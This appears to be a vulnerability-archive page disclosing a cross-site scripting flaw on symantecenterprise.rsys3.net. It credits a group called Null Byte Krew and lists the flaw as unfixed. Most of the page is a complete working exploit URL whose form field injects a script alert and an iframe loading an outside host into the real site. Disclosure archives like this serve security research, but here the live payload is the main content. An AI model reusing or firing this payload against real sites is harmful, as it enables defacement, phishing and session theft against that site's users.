Security researcher Null Byte Krew, has submitted on 20/11/2010 a cross-site-scripting (XSS) vulnerability affecting symantecenterprise.rsys3.net, which at the time of submission ranked 159355 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/01/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 20/11/2010 |
Date published: 13/01/2012 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Null Byte Krew |
Domain: symantecenterprise.rsys3.net |
Category: XSS |
Pagerank: 159355 |
|---|
URL: https://symantecenterprise.rsys3.net/servlet/campaignrespondent?FIRSTNAME=qq&LASTNAME=qqqq&COMPANY=q
qqq&JOBTITLE=Vice+President&ADDRESS1=qqqq&ADDRESS2=qqqq&CITY=qqqq&STATEPROVINCE=AK&COUNTRY=United+St
ates+of+America&POSTALCODE=90210&PHONENUMBER=999&EMAIL=qqqq@aaa&COMPANYSIZE=1+to+10&QUESTION=ttm%3C/
textarea%3E%3Cbr%20/%3E%3Cscript%3Ealert%28%27Owned%20With%20XSS%20-%20NBK%27%29%3C/script%3E%3Cifra
me%20src=%22http://vexr.limewebs.com%22%20height=%22500%22%20width=%22500%22%3E&button=Submit&_Requi
redFields_=FIRSTNAME,LASTNAME,COMPANY,JOBTITLE,ADDRESS1,CITY,STATEPROV%E2%80%8BINCE,COUNTRY,POSTALCO
DE,PHONENUMBER,EMAIL,COMPANYSIZE&_EMailFields_=EMAIL&_RealFields_=&_IntegerFields_=&_BannedFields_=T
RUE&_ID_=symc.2114.-2&Campaign_=JK_Form_RequestSalesCall_MASTER&charset_=UTF-8&_InlineResponseRule_=
true&_Sent_=2010-08-23+16:19:41.610&ACTIVITYCODE=92078&EMail_=92078&__HIDDEN_FIELD_NAMES__=_Required
Fields_;_EMailFields_;_RealFields_;_IntegerF%E2%80%8Bields_;_BannedFields_;_ID_;Campaign_;charset_;_
InlineResponseRule_;_Sent_;ACTIVI%E2%80%8BTYCODE;EMail_;__HIDDEN_FIELD_NAMES__ |
|
Click here to view the mirror
|
|
|
| 
